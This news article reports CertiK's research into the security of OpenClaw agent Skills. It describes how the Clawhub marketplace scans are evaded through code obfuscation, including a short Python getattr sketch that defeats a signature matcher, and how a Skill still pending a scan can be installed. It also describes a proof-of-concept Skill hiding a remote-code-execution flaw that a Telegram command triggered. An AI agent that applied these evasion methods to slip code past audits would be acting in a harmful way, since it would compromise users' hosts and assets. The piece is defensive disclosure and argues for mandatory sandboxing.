Is Your "OpenClaw" Running Naked? CertiK Test: How a Vulnerable OpenClaw Skill Bypasses Audits and Takes Over Computers Without Authorization

marsbit | Published on 2026-03-17 | Last updated on 2026-03-17

Abstract

OpenClaw, a popular open-source, self-hosted AI agent platform, has experienced rapid growth due to its flexibility and extensibility. Its ecosystem relies heavily on third-party “Skills” from the Clawhub marketplace, which can perform high-risk operations like system automation and crypto wallet transactions. However, security firm CertiK has identified critical weaknesses in the platform’s security model. CertiK’s research reveals that OpenClaw’s current security, which depends primarily on pre-publishing scans (VirusTotal, static code analysis, and AI logic checks), is fundamentally flawed. These measures can be bypassed through simple code obfuscation, and Skills can be published and installed before scanning is complete. In a proof-of-concept, CertiK developed a seemingly benign Skill that contained a hidden remote code execution vulnerability. It passed all checks without warnings and, once installed, allowed arbitrary command execution on the host via a remote command. The core issue is not a specific bug but an industry-wide misconception: over-reliance on scanning instead of runtime isolation. Unlike systems like iOS, which enforce strict sandboxing, OpenClaw’s sandbox is optional and often disabled for functionality, leaving systems exposed. CertiK recommends that OpenClaw enforce mandatory sandboxing and granular permission controls for Skills. Users are advised to deploy OpenClaw on isolated devices and avoid exposing sensitive data or assets until stronger isolation is i...

Recently, the open-source self-hosted AI agent platform OpenClaw (colloquially known as "小龙虾" or "Little Crayfish") has rapidly gained popularity thanks to its extensibility and self-controlled deployment, becoming a phenomenon in the personal AI agent space. Its core ecosystem, Clawhub, serves as an app marketplace that gathers a vast number of third-party Skill plugins. These let agents unlock advanced capabilities with one click, from web search and content creation to crypto wallet operations, on-chain interactions, and system automation, and they have driven explosive growth in both ecosystem scale and user base.

But for these third-party Skills running in high-privilege environments, where exactly are the platform's true security boundaries?

CertiK, the world's largest Web3 security company, recently released new research on Skill security. The report argues that the market misjudges where the security boundary of an AI agent ecosystem lies: the industry generally treats "Skill scanning" as the core security boundary, yet this mechanism offers almost no protection against real attacks.

If OpenClaw is compared to an operating system for smart devices, Skills are the apps installed on that system. Unlike ordinary consumer apps, some Skills in OpenClaw run in high-privilege environments: they directly access local files, call system tools, connect to external services, execute commands on the host, and even operate users' crypto assets. A security failure can therefore lead directly to serious consequences such as leakage of sensitive information, remote device takeover, and theft of digital assets.

The industry's standard security approach for third-party Skills is "pre-listing scanning and auditing." OpenClaw's Clawhub has likewise built a three-layer audit system that combines VirusTotal code scanning, a static code detection engine, and AI logic consistency checks, and it pushes security alerts to users based on a risk classification. However, CertiK's research and proof-of-concept attack tests show that this detection system falls short in real attack and defense scenarios and cannot serve as the primary line of protection.

The research first breaks down the inherent limitations of the existing detection mechanisms:

Static detection rules are easily bypassed. The engine identifies risks by matching code features, for example flagging the combination of "reading sensitive environment information + sending network requests" as high-risk behavior. However, attackers only need to make slight syntactic modifications to evade feature matching while fully retaining the malicious logic, much like rephrasing dangerous content with synonyms, which leaves the scanner ineffective.
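The bypass described above can be illustrated with a minimal sketch. The rule below is a hypothetical signature matcher written for this example, not Clawhub's actual engine; the two regular expressions, the `naive_scan` helper, and both source snippets are assumptions. The snippets are only inspected as text and are never executed.

```python
import re

# Hypothetical signature rule (an assumption, not Clawhub's real rule set):
# flag source that both reads environment variables and sends a network request.
ENV_READ = re.compile(r"os\.environ")
NET_SEND = re.compile(r"requests\.(post|get)")


def naive_scan(source: str) -> bool:
    """Return True when the source text matches both signatures."""
    return bool(ENV_READ.search(source)) and bool(NET_SEND.search(source))


# Straightforward spelling of the flagged behaviour.
ORIGINAL = '''
import os, requests
requests.post(URL, data=os.environ["API_KEY"])
'''

# Same behaviour, different spelling: attribute names are assembled at
# runtime, so neither textual signature appears in the source.
REWRITTEN = '''
import os, requests
env = getattr(os, "env" + "iron")
send = getattr(requests, "po" + "st")
send(URL, data=env["API_KEY"])
'''

print(naive_scan(ORIGINAL))   # True
print(naive_scan(REWRITTEN))  # False
```

A rule that matches spelling rather than behaviour can always be sidestepped this way, which is why the research treats scanning as a filter for unsophisticated attacks rather than a security boundary.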

AI auditing has inherent blind spots. Clawhub's AI audit is positioned as a "logic consistency detector": it can only catch obvious malicious code whose declared functionality does not match its actual behavior, and it is ineffective against exploitable vulnerabilities hidden within normal business logic, much as it is difficult to spot a fatal trap buried deep in the clauses of a seemingly compliant contract.

More critically, the audit process has an underlying design flaw: a Skill whose VirusTotal scan is still in a "pending" state, and which has therefore not completed the full "health check," can be listed publicly, and users can install it without any warning, leaving an opening for attackers.
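One way to close the gap described above is a fail-closed listing gate: a Skill stays unlisted until every required check has finished with a clean result. The sketch below is an assumption for illustration only; the `ScanStatus` values, the check names, and `may_list_publicly` are hypothetical and do not describe Clawhub's implementation.

```python
from enum import Enum


class ScanStatus(Enum):
    PENDING = "pending"
    CLEAN = "clean"
    FLAGGED = "flagged"


# Hypothetical names for the three audit layers mentioned in the article.
REQUIRED_CHECKS = ("virustotal", "static", "ai_review")


def may_list_publicly(statuses: dict[str, ScanStatus]) -> bool:
    """Fail closed: a missing, pending, or flagged check blocks listing."""
    return all(statuses.get(name) is ScanStatus.CLEAN for name in REQUIRED_CHECKS)


in_progress = {
    "virustotal": ScanStatus.PENDING,
    "static": ScanStatus.CLEAN,
    "ai_review": ScanStatus.CLEAN,
}
print(may_list_publicly(in_progress))  # False
```

Treating "pending" the same as "flagged" costs some publishing latency, but it removes the window in which an unscanned Skill can be installed without a warning.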

To verify how harmful the risk really is, the CertiK research team ran an end-to-end test. The team developed a Skill named "test-web-searcher," which on the surface appears to be a fully compliant web search tool whose code follows standard development norms, but which actually embeds a remote code execution vulnerability within its normal functional flow.

This Skill bypassed both the static engine and the AI audit, and it installed normally without any security warning while the VirusTotal scan was still pending. Finally, an instruction sent remotely via Telegram triggered the vulnerability and achieved arbitrary command execution on the host device (in the demo, it directly made the system launch the calculator).

CertiK states in the research that these issues are not bugs unique to OpenClaw, but a common misconception across the entire AI agent industry: the industry generally treats "audit scanning" as the core line of defense and neglects the true security foundation, which is mandatory runtime isolation and fine-grained permission control. By analogy, the security core of Apple's iOS ecosystem has never been the strict review of the App Store, but rather the system's mandatory sandbox mechanism and fine-grained permission control, which confine each app to its own "isolation compartment" so that it cannot obtain system permissions arbitrarily. OpenClaw's existing sandbox mechanism, by contrast, is optional rather than mandatory and relies heavily on manual user configuration. The vast majority of users disable the sandbox to keep Skills functional and available, which leaves the agent "running naked." Once a Skill with vulnerabilities or malicious code is installed, the consequences can be catastrophic.
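The fine-grained permission control described above can be sketched as a default-deny capability check. Everything here is hypothetical: `SkillManifest`, the capability strings, and `run_shell` are illustrative names, not OpenClaw's API. The sketch shows only the permission gate; real isolation would also need enforcement by the operating system or a container, which an in-process check cannot provide.

```python
from dataclasses import dataclass, field


class PermissionDenied(Exception):
    """Raised when a Skill requests a capability it was never granted."""


@dataclass(frozen=True)
class SkillManifest:
    # Hypothetical manifest: a Skill starts with no capabilities at all.
    name: str
    granted: frozenset[str] = field(default_factory=frozenset)


def require(manifest: SkillManifest, capability: str) -> None:
    """Default deny: anything not explicitly granted is refused."""
    if capability not in manifest.granted:
        raise PermissionDenied(f"{manifest.name} lacks '{capability}'")


def run_shell(manifest: SkillManifest, command: str) -> str:
    require(manifest, "shell.exec")
    # A real runtime would execute the command inside a sandbox here;
    # this sketch only reports what would have been run.
    return f"would run: {command}"


searcher = SkillManifest("test-web-searcher", frozenset({"net.fetch"}))
try:
    run_shell(searcher, "open -a Calculator")
except PermissionDenied as err:
    print(err)  # test-web-searcher lacks 'shell.exec'
```

Under this model a web search Skill that was granted only network access could not reach the host shell, even if a vulnerability in its own logic were triggered remotely.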

Regarding the issues discovered, CertiK also provided security guidance:

● For developers of AI agents like OpenClaw, sandbox isolation must be the default, mandatory configuration for third-party Skills, backed by a fine-grained permission control model, and third-party code must never be allowed to inherit the host machine's high privileges by default.

● For ordinary users, a "Safe" label in the Skill marketplace merely indicates that no risks were detected, not that the Skill is absolutely safe. Until strong underlying isolation becomes the official default configuration, it is recommended to deploy OpenClaw on non-critical idle devices or virtual machines, and never to let it near sensitive files, password credentials, or high-value crypto assets.

The AI agent sector is on the eve of explosive growth, and ecosystem expansion must not outpace security work. Audit scanning can only block basic malicious attacks; it can never serve as the security boundary for high-privilege agents. Only by shifting from "pursuing perfect detection" to "assuming risk exists and containing damage," and by enforcing isolation boundaries at the lowest layer of the runtime, can the security baseline of AI agents truly be upheld, allowing this technological transformation to proceed steadily and go the distance.

Related Questions

Q: What is the main security vulnerability identified by CertiK in the OpenClaw platform's Skill ecosystem?

A: The main vulnerability is the industry's misplaced reliance on pre-upload "scanning and auditing" as the core security boundary. This system is easily bypassed, and the platform lacks mandatory, default sandbox isolation and a fine-grained permission control model for third-party Skills, leaving high-privilege environments exposed.

Q: How did CertiK's proof-of-concept Skill, "test-web-searcher," demonstrate the security flaw?

A: The "test-web-searcher" Skill, which appeared to be a compliant web search tool, contained a hidden remote code execution vulnerability. It bypassed the static and AI auditing checks, was installed without any security warnings, and was triggered via a remote Telegram command to execute arbitrary commands on the host machine (e.g., launching the system calculator).

Q: What are the two key limitations of Clawhub's current three-layer audit protection system, as outlined in the research?

A: 1. Static detection rules can be easily bypassed through minor syntactic changes to the code that preserve the malicious logic. 2. The AI audit has a fundamental blind spot: it can only detect a mismatch between declared and actual functionality and is ineffective against hidden vulnerabilities embedded within normal business logic.

Q: What core security principle does CertiK recommend that OpenClaw and similar AI agent platforms adopt, drawing a comparison to Apple's iOS?

A: CertiK recommends adopting a mandatory sandbox isolation mechanism and a fine-grained permission control model as the default setting for third-party Skills. This is analogous to the iOS security model, where apps run in an enforced sandbox and are strictly permission-controlled, rather than relying primarily on App Store review.

Q: What practical safety advice does the article give to ordinary users of OpenClaw until stronger security measures are implemented?

A: Users are advised not to trust the "Safe" label on Skills, as it only means no risks were detected, not that the Skill is absolutely safe. They should deploy OpenClaw on non-critical, idle devices or within a virtual machine, keeping it away from sensitive files, password credentials, and high-value crypto assets.
